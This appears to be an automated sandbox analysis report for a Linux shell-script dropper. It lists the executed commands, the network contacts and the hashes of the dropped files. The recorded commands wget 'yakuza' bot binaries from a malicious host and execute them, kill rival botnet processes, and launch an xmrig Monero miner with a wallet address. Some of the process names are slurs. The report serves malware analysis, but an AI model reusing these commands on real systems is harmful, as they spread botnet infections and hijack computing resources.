[pkill -9 SO190Ij1X]

/bin/busybox

[busybox pkill -9 SO190Ij1X]

/bin/sh

[sh -c pkill -9 LOLKIKEEEDDE || busybox pkill -9 LOLKIKEEEDDE]

/usr/bin/pkill

[pkill -9 LOLKIKEEEDDE]

/bin/busybox

[busybox pkill -9 LOLKIKEEEDDE]

/bin/chmod

[chmod +x yakuza.i686]

/tmp/yakuza.i686

[./yakuza.i686]

/bin/rm

[rm -rf yakuza.i686]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.ppc]

/bin/sh

[sh -c pkill -9 ekjheory98e || busybox pkill -9 ekjheory98e]

/usr/bin/pkill

[pkill -9 ekjheory98e]

/bin/busybox

[busybox pkill -9 ekjheory98e]

/bin/sh

[sh -c pkill -9 scansh4 || busybox pkill -9 scansh4]

/usr/bin/pkill

[pkill -9 scansh4]

/bin/busybox

[busybox pkill -9 scansh4]

/bin/chmod

[chmod +x yakuza.ppc]

/tmp/yakuza.ppc

[./yakuza.ppc]

/bin/rm

[rm -rf yakuza.ppc]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.i586]

/bin/sh

[sh -c pkill -9 MDMA || busybox pkill -9 MDMA]

/usr/bin/pkill

[pkill -9 MDMA]

/bin/busybox

[busybox pkill -9 MDMA]

/bin/sh

[sh -c pkill -9 fdevalvex || busybox pkill -9 fdevalvex]

/usr/bin/pkill

[pkill -9 fdevalvex]

/bin/busybox

[busybox pkill -9 fdevalvex]

/bin/chmod

[chmod +x yakuza.i586]

/tmp/yakuza.i586

[./yakuza.i586]

/bin/rm

[rm -rf yakuza.i586]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.m68k]

/bin/sh

[sh -c pkill -9 scanspc || busybox pkill -9 scanspc]

/usr/bin/pkill

[pkill -9 scanspc]

/bin/busybox

[busybox pkill -9 scanspc]

/bin/sh

[sh -c pkill -9 MELTEDNINJAREALZ || busybox pkill -9 MELTEDNINJAREALZ]

/usr/bin/pkill

[pkill -9 MELTEDNINJAREALZ]

/bin/busybox

[busybox pkill -9 MELTEDNINJAREALZ]

/bin/chmod

[chmod +x yakuza.m68k]

/tmp/yakuza.m68k

[./yakuza.m68k]

/bin/rm

[rm -rf yakuza.m68k]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm4]

/bin/sh

[sh -c pkill -9 flexsonskids || busybox pkill -9 flexsonskids]

/usr/bin/pkill

[pkill -9 flexsonskids]

/bin/busybox

[busybox pkill -9 flexsonskids]

/bin/sh

[sh -c pkill -9 scanx86 || busybox pkill -9 scanx86]

/usr/bin/pkill

[pkill -9 scanx86]

/bin/busybox

[busybox pkill -9 scanx86]

/bin/chmod

[chmod +x yakuza.arm4]

/tmp/yakuza.arm4

[./yakuza.arm4]

/bin/rm

[rm -rf yakuza.arm4]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm5]

/bin/sh

[sh -c pkill -9 MISAKI-U79OL || busybox pkill -9 MISAKI-U79OL]

/usr/bin/pkill

[pkill -9 MISAKI-U79OL]

/bin/busybox

[busybox pkill -9 MISAKI-U79OL]

/bin/chmod

[chmod +x yakuza.arm5]

/tmp/yakuza.arm5

[./yakuza.arm5]

/bin/rm

[rm -rf yakuza.arm5]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm7]

/bin/sh

[sh -c pkill -9 foAxi102kxe || busybox pkill -9 foAxi102kxe]

/usr/bin/pkill

[pkill -9 foAxi102kxe]

/bin/busybox

[busybox pkill -9 foAxi102kxe]

/bin/sh

[sh -c pkill -9 swodjwodjwoj || busybox pkill -9 swodjwodjwoj]

/usr/bin/pkill

[pkill -9 swodjwodjwoj]

/bin/busybox

[busybox pkill -9 swodjwodjwoj]

/bin/chmod

[chmod +x yakuza.arm7]

/tmp/yakuza.arm7

[./yakuza.arm7]

/bin/rm

[rm -rf yakuza.arm7]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.sparc]

/bin/sh

[sh -c pkill -9 MmKiy7f87l || busybox pkill -9 MmKiy7f87l]

/usr/bin/pkill

[pkill -9 MmKiy7f87l]

/bin/busybox

[busybox pkill -9 MmKiy7f87l]

/bin/sh

[sh -c pkill -9 freecookiex86 || busybox pkill -9 freecookiex86]

/usr/bin/pkill

[pkill -9 freecookiex86]

/bin/chmod

[chmod +x yakuza.sparc]

/tmp/yakuza.sparc

[./yakuza.sparc]

/bin/busybox

[busybox pkill -9 freecookiex86]

/bin/rm

[rm -rf yakuza.sparc]

/bin/bash

[bash]

/usr/bin/curl

[curl -s http://linux-it.abuser.eu/test.php]

/bin/sh

[sh -c pkill -9 sysgpu || busybox pkill -9 sysgpu]

/bin/grep

[grep -v grep]

/bin/grep

[grep xmrig]

/bin/ps

[ps x]

/bin/grep

[grep 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW]

/usr/bin/pkill

[pkill -9 sysgpu]

/bin/busybox

[busybox pkill -9 sysgpu]

/usr/bin/curl

[curl -O ftp://linux-it.abuser.eu/xmrig-lnx/xmrig]

/bin/sh

[sh -c pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd]

/usr/bin/pkill

[pkill -9 NiGGeR69xd]

/bin/busybox

[busybox pkill -9 NiGGeR69xd]

/bin/sh

[sh -c pkill -9 frgege || busybox pkill -9 frgege]

/usr/bin/pkill

[pkill -9 frgege]

/bin/busybox

[busybox pkill -9 frgege]

/bin/sh

[sh -c pkill -9 sysupdater || busybox pkill -9 sysupdater]

/usr/bin/pkill

[pkill -9 sysupdater]

/bin/busybox

[busybox pkill -9 sysupdater]

/bin/sh

[sh -c pkill -9 0DnAzepd || busybox pkill -9 0DnAzepd]

/usr/bin/pkill

[pkill -9 0DnAzepd]

/bin/busybox

[busybox pkill -9 0DnAzepd]

/bin/sh

[sh -c pkill -9 NiGGeRD0nks69 || busybox pkill -9 NiGGeRD0nks69]

/usr/bin/pkill

[pkill -9 NiGGeRD0nks69]

/bin/busybox

[busybox pkill -9 NiGGeRD0nks69]

/bin/sh

[sh -c pkill -9 frgreu || busybox pkill -9 frgreu]

/usr/bin/pkill

[pkill -9 frgreu]

/bin/busybox

[busybox pkill -9 frgreu]

/bin/sh

[sh -c pkill -9 telnetd || busybox pkill -9 telnetd]

/usr/bin/pkill

[pkill -9 telnetd]

/bin/busybox

[busybox pkill -9 telnetd]

/bin/sh

[sh -c pkill -9 0x766f6964 || busybox pkill -9 0x766f6964]

/usr/bin/pkill

[pkill -9 0x766f6964]

/bin/busybox

[busybox pkill -9 0x766f6964]

/bin/sh

[sh -c pkill -9 NiGGeRd0nks1337 || busybox pkill -9 NiGGeRd0nks1337]

/usr/bin/pkill

[pkill -9 NiGGeRd0nks1337]

/bin/busybox

[busybox pkill -9 NiGGeRd0nks1337]

/bin/chmod

[chmod +x xmrig]

/usr/bin/nohup

[nohup ./xmrig --url gulf.moneroocean.stream:443 --user 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW --pass worker875 --tls --cpu-priority=3 --asm=auto]

/tmp/xmrig

[./xmrig --url gulf.moneroocean.stream:443 --user 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW --pass worker875 --tls --cpu-priority=3 --asm=auto]

/bin/sh

[/bin/sh ./xmrig --url gulf.moneroocean.stream:443 --user 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW --pass worker875 --tls --cpu-priority=3 --asm=auto]

/bin/sh

[sh -c pkill -9 gaft || busybox pkill -9 gaft]

/usr/bin/pkill

[pkill -9 gaft]

/bin/busybox

[busybox pkill -9 gaft]

/bin/sh

[sh -c pkill -9 urasgbsigboa || busybox pkill -9 urasgbsigboa]

/usr/bin/pkill

[pkill -9 urasgbsigboa]

/bin/busybox

[busybox pkill -9 urasgbsigboa]

/bin/sh

[sh -c pkill -9 120i3UI49 || busybox pkill -9 120i3UI49]

/usr/bin/pkill

[pkill -9 120i3UI49]

/bin/busybox

[busybox pkill -9 120i3UI49]

/bin/sh

[sh -c pkill -9 OaF3 || busybox pkill -9 OaF3]

/usr/bin/pkill

[pkill -9 OaF3]

/bin/busybox

[busybox pkill -9 OaF3]

/bin/sh

[sh -c pkill -9 geae || busybox pkill -9 geae]

/usr/bin/pkill

[pkill -9 geae]

/bin/busybox

[busybox pkill -9 geae]

/bin/sh

[sh -c pkill -9 vaiolmao || busybox pkill -9 vaiolmao]

/usr/bin/pkill

[pkill -9 vaiolmao]

/bin/busybox

[busybox pkill -9 vaiolmao]

/bin/sh

[sh -c pkill -9 123123a || busybox pkill -9 123123a]

/usr/bin/pkill

[pkill -9 123123a]

/bin/busybox

[busybox pkill -9 123123a]

/bin/sh

[sh -c pkill -9 Ofurain0n4H34D || busybox pkill -9 Ofurain0n4H34D]

/usr/bin/pkill

[pkill -9 Ofurain0n4H34D]

/bin/busybox

[busybox pkill -9 Ofurain0n4H34D]

/bin/sh

[sh -c pkill -9 ggTrex || busybox pkill -9 ggTrex]

/usr/bin/pkill

[pkill -9 ggTrex]

/bin/busybox

[busybox pkill -9 ggTrex]

/bin/sh

[sh -c pkill -9 wasads || busybox pkill -9 wasads]

/usr/bin/pkill

[pkill -9 wasads]

/bin/busybox

[busybox pkill -9 wasads]

/bin/sh

[sh -c pkill -9 1293194hjXD || busybox pkill -9 1293194hjXD]

/usr/bin/pkill

[pkill -9 1293194hjXD]

/bin/busybox

[busybox pkill -9 1293194hjXD]

/bin/sh

[sh -c pkill -9 OthLaLosn || busybox pkill -9 OthLaLosn]

/usr/bin/pkill

[pkill -9 OthLaLosn]

/bin/busybox

[busybox pkill -9 OthLaLosn]

/bin/sh

[sh -c pkill -9 ggt || busybox pkill -9 ggt]

/usr/bin/pkill

[pkill -9 ggt]

/bin/busybox

[busybox pkill -9 ggt]

/bin/sh

[sh -c pkill -9 wget-log || busybox pkill -9 wget-log]

/usr/bin/pkill

[pkill -9 wget-log]

/bin/busybox

[busybox pkill -9 wget-log]

/bin/sh

[sh -c pkill -9 1337SoraLOADER || busybox pkill -9 1337SoraLOADER]

/usr/bin/pkill

[pkill -9 1337SoraLOADER]

/bin/busybox

[busybox pkill -9 1337SoraLOADER]

/bin/sh

[sh -c pkill -9 SAIAKINA || busybox pkill -9 SAIAKINA]

/usr/bin/pkill

[pkill -9 SAIAKINA]

/bin/busybox

[busybox pkill -9 SAIAKINA]

/bin/sh

[sh -c pkill -9 ggtq || busybox pkill -9 ggtq]

/usr/bin/pkill

[pkill -9 ggtq]

/bin/busybox

[busybox pkill -9 ggtq]

/bin/sh

[sh -c pkill -9 1378bfp919GRB1Q2 || busybox pkill -9 1378bfp919GRB1Q2]

/usr/bin/pkill

[pkill -9 1378bfp919GRB1Q2]

/bin/busybox

[busybox pkill -9 1378bfp919GRB1Q2]

/bin/sh

[sh -c pkill -9 SAIAKUSO || busybox pkill -9 SAIAKUSO]

/usr/bin/pkill

[pkill -9 SAIAKUSO]

/bin/busybox

[busybox pkill -9 SAIAKUSO]

/bin/sh

[sh -c pkill -9 ggtr || busybox pkill -9 ggtr]

/usr/bin/pkill

[pkill -9 ggtr]

/bin/busybox

[busybox pkill -9 ggtr]

/bin/sh

[sh -c pkill -9 14Fa || busybox pkill -9 14Fa]

/usr/bin/pkill

[pkill -9 14Fa]

/bin/busybox

[busybox pkill -9 14Fa]

/bin/sh

[sh -c pkill -9 SEXSLAVE1337 || busybox pkill -9 SEXSLAVE1337]

/usr/bin/pkill

[pkill -9 SEXSLAVE1337]

/bin/busybox

[busybox pkill -9 SEXSLAVE1337]

/bin/sh

[sh -c pkill -9 ggtt || busybox pkill -9 ggtt]

/usr/bin/pkill

[pkill -9 ggtt]

/bin/busybox

[busybox pkill -9 ggtt]

/bin/sh

[sh -c pkill -9 1902a3u912u3u4 || busybox pkill -9 1902a3u912u3u4]

/usr/bin/pkill

[pkill -9 1902a3u912u3u4]

/bin/busybox

[busybox pkill -9 1902a3u912u3u4]

/bin/sh

[sh -c pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X]

/usr/bin/pkill

[pkill -9 SO190Ij1X]

/bin/busybox

[busybox pkill -9 SO190Ij1X]

/bin/sh

[sh -c pkill -9 haetrghbr || busybox pkill -9 haetrghbr]

/usr/bin/pkill

[pkill -9 haetrghbr]

/bin/busybox

[busybox pkill -9 haetrghbr]

/bin/sh

[sh -c pkill -9 19ju3d || busybox pkill -9 19ju3d]

/usr/bin/pkill

[pkill -9 19ju3d]

/bin/busybox

[busybox pkill -9 19ju3d]

/bin/sh

[sh -c pkill -9 SORAojkf120 || busybox pkill -9 SORAojkf120]

/usr/bin/pkill

[pkill -9 SORAojkf120]

/bin/busybox

[busybox pkill -9 SORAojkf120]

/bin/sh

[sh -c pkill -9 hehahejeje92 || busybox pkill -9 hehahejeje92]

/usr/bin/pkill

[pkill -9 hehahejeje92]

/bin/busybox

[busybox pkill -9 hehahejeje92]

/bin/sh

[sh -c pkill -9 2U2JDJA901F91 || busybox pkill -9 2U2JDJA901F91]

/usr/bin/pkill

[pkill -9 2U2JDJA901F91]

/bin/busybox

[busybox pkill -9 2U2JDJA901F91]

/bin/sh

[sh -c pkill -9 SlaVLav12 || busybox pkill -9 SlaVLav12]

/usr/bin/pkill

[pkill -9 SlaVLav12]

/bin/busybox

[busybox pkill -9 SlaVLav12]

/bin/sh

[sh -c pkill -9 helpmedaddthhhhh || busybox pkill -9 helpmedaddthhhhh]

/usr/bin/pkill

[pkill -9 helpmedaddthhhhh]

/bin/busybox

[busybox pkill -9 helpmedaddthhhhh]

/bin/sh

[sh -c pkill -9 2wgg9qphbq || busybox pkill -9 2wgg9qphbq]

/usr/bin/pkill

[pkill -9 2wgg9qphbq]

/bin/busybox

[busybox pkill -9 2wgg9qphbq]

/bin/sh

[sh -c pkill -9 Slav3Th3seD3vices || busybox pkill -9 Slav3Th3seD3vices]

/usr/bin/pkill

[pkill -9 Slav3Th3seD3vices]

/bin/busybox

[busybox pkill -9 Slav3Th3seD3vices]

/bin/sh

[sh -c pkill -9 hzSmYZjYMQ || busybox pkill -9 hzSmYZjYMQ]

/usr/bin/pkill

[pkill -9 hzSmYZjYMQ]

/bin/busybox

[busybox pkill -9 hzSmYZjYMQ]

/bin/sh

[sh -c pkill -9 5Gbf || busybox pkill -9 5Gbf]

/usr/bin/pkill

[pkill -9 5Gbf]

/bin/busybox

[busybox pkill -9 5Gbf]

/bin/sh

[sh -c pkill -9 SoRAxD123LOL || busybox pkill -9 SoRAxD123LOL]

/usr/bin/pkill

[pkill -9 SoRAxD123LOL]

/bin/busybox

[busybox pkill -9 SoRAxD123LOL]

/bin/sh

[sh -c pkill -9 iaGv || busybox pkill -9 iaGv]

/usr/bin/pkill

[pkill -9 iaGv]

/bin/busybox

[busybox pkill -9 iaGv]

/bin/sh

[sh -c pkill -9 5aA3 || busybox pkill -9 5aA3]

/usr/bin/pkill

[pkill -9 5aA3]

/bin/busybox

[busybox pkill -9 5aA3]

/bin/sh

[sh -c pkill -9 SoRAxD420LOL || busybox pkill -9 SoRAxD420LOL]

/usr/bin/pkill

[pkill -9 SoRAxD420LOL]

/bin/busybox

[busybox pkill -9 SoRAxD420LOL]

/bin/sh

[sh -c pkill -9 insomni || busybox pkill -9 insomni]

/usr/bin/pkill

[pkill -9 insomni]

/bin/busybox

[busybox pkill -9 insomni]

/bin/sh

[sh -c pkill -9 640277 || busybox pkill -9 640277]

/usr/bin/pkill

[pkill -9 640277]

/bin/busybox

[busybox pkill -9 640277]

/bin/sh

[sh -c pkill -9 SoraBeReppin1337 || busybox pkill -9 SoraBeReppin1337]

/usr/bin/pkill

[pkill -9 SoraBeReppin1337]

/bin/busybox

[busybox pkill -9 SoraBeReppin1337]

/bin/sh

[sh -c pkill -9 ipcamCache || busybox pkill -9 ipcamCache]

/usr/bin/pkill

[pkill -9 ipcamCache]

/bin/busybox

[busybox pkill -9 ipcamCache]

/bin/sh

[sh -c pkill -9 66tlGg9Q || busybox pkill -9 66tlGg9Q]

/usr/bin/pkill

[pkill -9 66tlGg9Q]

/bin/busybox

[busybox pkill -9 66tlGg9Q]

/bin/sh

[sh -c pkill -9 T || busybox pkill -9 T]

/usr/bin/pkill

[pkill -9 T]

/bin/busybox

[busybox pkill -9 T]

/bin/sh

[sh -c pkill -9 jUYfouyf87 || busybox pkill -9 jUYfouyf87]

/usr/bin/pkill

[pkill -9 jUYfouyf87]

/bin/busybox

[busybox pkill -9 jUYfouyf87]

/bin/sh

[sh -c pkill -9 6ke3 || busybox pkill -9 6ke3]

/usr/bin/pkill

[pkill -9 6ke3]

/bin/busybox

[busybox pkill -9 6ke3]

/bin/sh

[sh -c pkill -9 TOKYO3 || busybox pkill -9 TOKYO3]

/usr/bin/pkill

[pkill -9 TOKYO3]

/bin/busybox

[busybox pkill -9 TOKYO3]

/bin/sh

[sh -c pkill -9 lyEeaXul2dULCVxh || busybox pkill -9 lyEeaXul2dULCVxh]

/usr/bin/pkill

[pkill -9 lyEeaXul2dULCVxh]

/bin/busybox

[busybox pkill -9 lyEeaXul2dULCVxh]

/bin/sh

[sh -c pkill -9 93OfjHZ2z || busybox pkill -9 93OfjHZ2z]

/usr/bin/pkill

[pkill -9 93OfjHZ2z]

/bin/busybox

[busybox pkill -9 93OfjHZ2z]

/bin/sh

[sh -c pkill -9 TY2gD6MZvKc7KU6r || busybox pkill -9 TY2gD6MZvKc7KU6r]

/usr/bin/pkill

[pkill -9 TY2gD6MZvKc7KU6r]

/bin/busybox

[busybox pkill -9 TY2gD6MZvKc7KU6r]

/bin/sh

[sh -c pkill -9 mMkiy6f87l || busybox pkill -9 mMkiy6f87l]

/usr/bin/pkill

[pkill -9 mMkiy6f87l]

/bin/busybox

[busybox pkill -9 mMkiy6f87l]

/bin/sh

[sh -c pkill -9 A023UU4U24UIU || busybox pkill -9 A023UU4U24UIU]

/usr/bin/pkill

[pkill -9 A023UU4U24UIU]

/bin/busybox

[busybox pkill -9 A023UU4U24UIU]

/bin/sh

[sh -c pkill -9 TheWeeknd || busybox pkill -9 TheWeeknd]

/usr/bin/pkill

[pkill -9 TheWeeknd]

/bin/busybox

[busybox pkill -9 TheWeeknd]

/bin/sh

[sh -c pkill -9 mioribitches || busybox pkill -9 mioribitches]

/usr/bin/pkill

[pkill -9 mioribitches]

/bin/busybox

[busybox pkill -9 mioribitches]

/bin/sh

[sh -c pkill -9 A5p9 || busybox pkill -9 A5p9]

/usr/bin/pkill

[pkill -9 A5p9]

/bin/busybox

[busybox pkill -9 A5p9]

/bin/sh

[sh -c pkill -9 TheWeeknds || busybox pkill -9 TheWeeknds]

/usr/bin/pkill

[pkill -9 TheWeeknds]

/bin/busybox

[busybox pkill -9 TheWeeknds]

/bin/sh

[sh -c pkill -9 mnblkjpoi || busybox pkill -9 mnblkjpoi]

/usr/bin/pkill

[pkill -9 mnblkjpoi]

/bin/busybox

[busybox pkill -9 mnblkjpoi]

/bin/sh

[sh -c pkill -9 AbAd || busybox pkill -9 AbAd]

/usr/bin/pkill

[pkill -9 AbAd]

/bin/busybox

[busybox pkill -9 AbAd]

/bin/sh

[sh -c pkill -9 Tokyos || busybox pkill -9 Tokyos]

/usr/bin/pkill

[pkill -9 Tokyos]

/bin/busybox

[busybox pkill -9 Tokyos]

/bin/sh

[sh -c pkill -9 neb || busybox pkill -9 neb]

/usr/bin/pkill

[pkill -9 neb]

/bin/busybox

[busybox pkill -9 neb]

/bin/sh

[sh -c pkill -9 Akiru || busybox pkill -9 Akiru]

/usr/bin/pkill

[pkill -9 Akiru]

/bin/busybox

[busybox pkill -9 Akiru]

/bin/sh

[sh -c pkill -9 U8inTz || busybox pkill -9 U8inTz]

/usr/bin/pkill

[pkill -9 U8inTz]

/bin/busybox

[busybox pkill -9 U8inTz]

/bin/sh

[sh -c pkill -9 netstats || busybox pkill -9 netstats]

/usr/bin/pkill

[pkill -9 netstats]

/bin/busybox

[busybox pkill -9 netstats]

/bin/sh

[sh -c pkill -9 Alex || busybox pkill -9 Alex]

/usr/bin/pkill

[pkill -9 Alex]

/bin/busybox

[busybox pkill -9 Alex]

/bin/sh

[sh -c pkill -9 W9RCAKM20T || busybox pkill -9 W9RCAKM20T]

/usr/bin/pkill

[pkill -9 W9RCAKM20T]

/bin/busybox

[busybox pkill -9 W9RCAKM20T]

/bin/sh

[sh -c pkill -9 newnetword || busybox pkill -9 newnetword]

/usr/bin/pkill

[pkill -9 newnetword]

/bin/busybox

[busybox pkill -9 newnetword]

/bin/sh

[sh -c pkill -9 Ayo215 || busybox pkill -9 Ayo215]

/usr/bin/pkill

[pkill -9 Ayo215]

/bin/busybox

[busybox pkill -9 Ayo215]

/bin/sh

[sh -c pkill -9 Word || busybox pkill -9 Word]

/usr/bin/pkill

[pkill -9 Word]

/bin/busybox

[busybox pkill -9 Word]

/bin/sh

[sh -c pkill -9 nloads || busybox pkill -9 nloads]

/usr/bin/pkill

[pkill -9 nloads]

/bin/busybox

[busybox pkill -9 nloads]

/bin/sh

[sh -c pkill -9 BAdAsV || busybox pkill -9 BAdAsV]

/usr/bin/pkill

[pkill -9 BAdAsV]

/bin/busybox

[busybox pkill -9 BAdAsV]

/bin/sh

[sh -c pkill -9 Wordmane || busybox pkill -9 Wordmane]

/usr/bin/pkill

[pkill -9 Wordmane]

/bin/busybox

[busybox pkill -9 Wordmane]

/bin/sh

[sh -c pkill -9 notyakuzaa || busybox pkill -9 notyakuzaa]

/usr/bin/pkill

[pkill -9 notyakuzaa]

/bin/busybox

[busybox pkill -9 notyakuzaa]

/bin/sh

[sh -c pkill -9 Belch || busybox pkill -9 Belch]

/usr/bin/pkill

[pkill -9 Belch]

/bin/busybox

[busybox pkill -9 Belch]

/bin/sh

[sh -c pkill -9 Wordnets || busybox pkill -9 Wordnets]

/usr/bin/pkill

[pkill -9 Wordnets]

/bin/busybox

[busybox pkill -9 Wordnets]

/bin/sh

[sh -c pkill -9 obp || busybox pkill -9 obp]

/usr/bin/pkill

[pkill -9 obp]

/bin/busybox

[busybox pkill -9 obp]

/bin/sh

[sh -c pkill -9 BigN0gg0r420 || busybox pkill -9 BigN0gg0r420]

/usr/bin/pkill

[pkill -9 BigN0gg0r420]

/bin/busybox

[busybox pkill -9 BigN0gg0r420]

/bin/sh

[sh -c pkill -9 X0102I34f || busybox pkill -9 X0102I34f]

/usr/bin/pkill

[pkill -9 X0102I34f]

/bin/busybox

[busybox pkill -9 X0102I34f]

/bin/sh

[sh -c pkill -9 ofhasfhiafhoi || busybox pkill -9 ofhasfhiafhoi]

/usr/bin/pkill

[pkill -9 ofhasfhiafhoi]

/bin/busybox

[busybox pkill -9 ofhasfhiafhoi]

/bin/sh

[sh -c pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY]

/usr/bin/pkill

[pkill -9 BzSxLxBxeY]

/bin/busybox

[busybox pkill -9 BzSxLxBxeY]

/bin/sh

[sh -c pkill -9 X19I239124UIU || busybox pkill -9 X19I239124UIU]

/usr/bin/pkill

[pkill -9 X19I239124UIU]

/bin/busybox

[busybox pkill -9 X19I239124UIU]

/bin/sh

[sh -c pkill -9 oism || busybox pkill -9 oism]

/usr/bin/pkill

[pkill -9 oism]

/bin/busybox

[busybox pkill -9 oism]

/bin/sh

[sh -c pkill -9 Deported || busybox pkill -9 Deported]

/usr/bin/pkill

[pkill -9 Deported]

/bin/busybox

[busybox pkill -9 Deported]

/bin/sh

[sh -c pkill -9 XSHJEHHEIIHWO || busybox pkill -9 XSHJEHHEIIHWO]

/usr/bin/pkill

[pkill -9 XSHJEHHEIIHWO]

/bin/busybox

[busybox pkill -9 XSHJEHHEIIHWO]

/bin/sh

[sh -c pkill -9 olsVNwo12 || busybox pkill -9 olsVNwo12]

/usr/bin/pkill

[pkill -9 olsVNwo12]

/bin/busybox

[busybox pkill -9 olsVNwo12]

/bin/sh

[sh -c pkill -9 DeportedDeported || busybox pkill -9 DeportedDeported]

/usr/bin/pkill

[pkill -9 DeportedDeported]

/bin/busybox

[busybox pkill -9 DeportedDeported]

/bin/sh

[sh -c pkill -9 XkTer0GbA1 || busybox pkill -9 XkTer0GbA1]

/usr/bin/pkill

[pkill -9 XkTer0GbA1]

/bin/busybox

[busybox pkill -9 XkTer0GbA1]

/bin/sh

[sh -c pkill -9 onry0v03 || busybox pkill -9 onry0v03]

/usr/bin/pkill

[pkill -9 onry0v03]

/bin/busybox

[busybox pkill -9 onry0v03]

/bin/sh

[sh -c pkill -9 FortniteDownLOLZ || busybox pkill -9 FortniteDownLOLZ]

/usr/bin/pkill

[pkill -9 FortniteDownLOLZ]

/bin/busybox

[busybox pkill -9 FortniteDownLOLZ]

/bin/sh

[sh -c pkill -9 Y0urM0mGay || busybox pkill -9 Y0urM0mGay]

/usr/bin/pkill

[pkill -9 Y0urM0mGay]

/bin/busybox

[busybox pkill -9 Y0urM0mGay]

/bin/sh

[sh -c pkill -9 pussyfartlmaojk || busybox pkill -9 pussyfartlmaojk]

/usr/bin/pkill

[pkill -9 pussyfartlmaojk]

/bin/busybox

[busybox pkill -9 pussyfartlmaojk]

Network

Country Destination Domain Proto
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:21 linux-it.abuser.eu tcp
IT 95.234.158.87:7108 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp

Files

/tmp/yakuza.mips

MD5 371732a722f576ce663cf832412521a8
SHA1 7d8f25bfc26af545c568ffc5c0afe8c4cd35de40
SHA256 11bd15eeca11f8fcb46cce41f4387505027446b5ba8774d2b7bd759bcdb1b9d0
SHA512 c2174eeaf058a5d78d2bb7e417373c56d5b407072de68aaae33c690fd14b93a033ef4aeb18f9a364541e51b6cfc0a28c93efbb4a1857a15b875d420e9886c014

/tmp/xmrig

MD5 8f4fff0ded94f1141768220906abfbb8
SHA1 ea7c97294f415dc8713ac8c280b3123da62f6e56
SHA256 b0e1ae6d73d656b203514f498b59cbcf29f067edf6fbd3803a3de7d21960848d
SHA512 0096072a1482f8e7999867baa3dd6e96d51591e9f7645c9ff276b53984957025c83e1fe52e5c4f55639eeed2bdbd80bbd57d7dacd84468ce09c834e39dfc4bee

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-24 02:41

Reported

2024-11-24 02:43

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

149s

Max time network

129s

Command Line

[/tmp/ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
